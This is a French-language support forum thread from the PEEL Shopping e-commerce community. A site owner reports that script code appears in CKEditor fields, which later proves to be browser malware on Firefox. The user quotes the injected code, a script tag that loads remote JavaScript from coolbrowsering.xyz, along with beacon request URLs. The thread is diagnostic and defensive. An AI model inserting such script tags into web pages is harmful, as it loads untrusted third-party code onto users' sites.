Bug dans les éditeurs de texte

Started by xeon,,

4 posts in this topic

Posted (edited) · Report post

Bonjour,

J'ai trois sites sur des versions 6.3. Ils sont sur des hébergements différents, il est donc peu probable qu'ils aient eu un virus. Je viens de faire un test avec une version 9.0 de Peel et je retrouve le même problème.

Je rencontre donc ce bug depuis dimanche dernier : Lorsque je clique dans le champ d'édition (branché avec CKEditor) de chacun des sites (j'ai fait le test avec FCK editor et CKEditor), j'ai ce code qui apparait immédiatement après dans la source : <script charset="UTF-8">
ss78mest = {"distributorId":"8","kTag":"0","pTag":"0","scriptDomain":"coolbrowsering.xyz","tag":"pl","uniqueID":"1552592168405","vTag":"28069","version":"200"};
tdUserStorage = {"browserStartedAt":1552985758398};
window["pTag84719287"] = "0";
window["jj837711"] = "1552592168405";</script>
<script charset="UTF-8" src="http://coolbrowsering.xyz/i.js?tag=pl&amp;did=8&amp;v_tag=28069&amp;k_tag=0">
</script>

Le code n'apparait que quand je clique dans le champ d'édition de contenu de l'éditeur, car quand la page est tout juste chargée, le terme "coolbrowsering" par exemple, n'apparait pas dans la source de la page.

Ce qui n'arrivait pas auparavant, c'est dimanche dernier que je m'en suis rendu compte, en allant sur un de ces 4 sites. Je travaille tous les jours dessus, donc si cela s'était produit avant, je l'aurais vu. Je n'ai fait aucune mise à jour de code ou de version php, et je me suis renseigné chez l'hébergeur, il n'y a pas eu de mise à jour non plus du côté des hébergements.

Savez-vous ce qui peut se passer.

Merci.

acnt?_=1553006178878&did=8&tag=pl&r=abou

acnt?_=1553006587233&did=8&tag=pl&r=abou

acnt?_=1553006660196&did=8&tag=pl&r=abou

acnt?_=1553008928245&did=8&tag=pl&r=abou

acnt?_=1553009392266&did=8&tag=pl&r=abou

Edited by xeon

Share this post

: post
Share on other sites

Posted · Report post

Bonjour,

Cela ressemble bien a un piratage de vos sites. Peut-être avez vous un virus sur votre ordinateur, qui a pu récupérer et transmettre les identifiants FTP de vos sites.
Sur le serveur vous pouvez vérifier les dates de mises à jour dans les dossiers lib/ckeditor et lib/FCKeditor pour constater si il y a un fichier mis à jour récemment dans ces dossiers.
Je vous invite à faire un scan antivirus de votre ordinateur et modifier les mots de passes des comptes FTP des sites concernés.

Share this post

: post
Share on other sites

Posted · Report post

Je viens d'effectuer un test avec Chrome, et là le code ne s'inscrit pas dans le champ du formulaire. Ce "virus" serait alors lié au navigateur utilisé. En l'occurrence Firefox.

acnt?_=1553006576859&did=8&tag=pl&r=abou

acnt?_=1553006593388&did=8&tag=pl&r=abou

acnt?_=1553006699244&did=8&tag=pl&r=abou

acnt?_=1553008840929&did=8&tag=pl&r=abou

acnt?_=1553008979044&did=8&tag=pl&r=abou

acnt?_=1553009384216&did=8&tag=pl&r=abou

acnt?_=1553009485583&did=8&tag=pl&r=abou

acnt?_=1553020474614&did=8&tag=pl&r=abou

acnt?_=1553069587967&did=8&tag=pl&r=abou

Share this post

: post
Share on other sites

Posted · Report post

J'ai fini par l'avoir je crois. Avec toute une batterie d'anti-virus, le dernier utilisé : Comodo.

acnt?_=1553070547494&did=8&tag=pl&r=abou

acnt?_=1553078638503&did=8&tag=pl&r=abou

acnt?_=1553082589813&did=8&tag=pl&r=abou

acnt?_=1553107523448&did=8&tag=pl&r=abou

Share this post

: post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now
Go To Topic Listing PEEL SHOPPING : logiciel open source de boutique en ligne

Twitter Advisto ecommerce

Facebook PEEL Shopping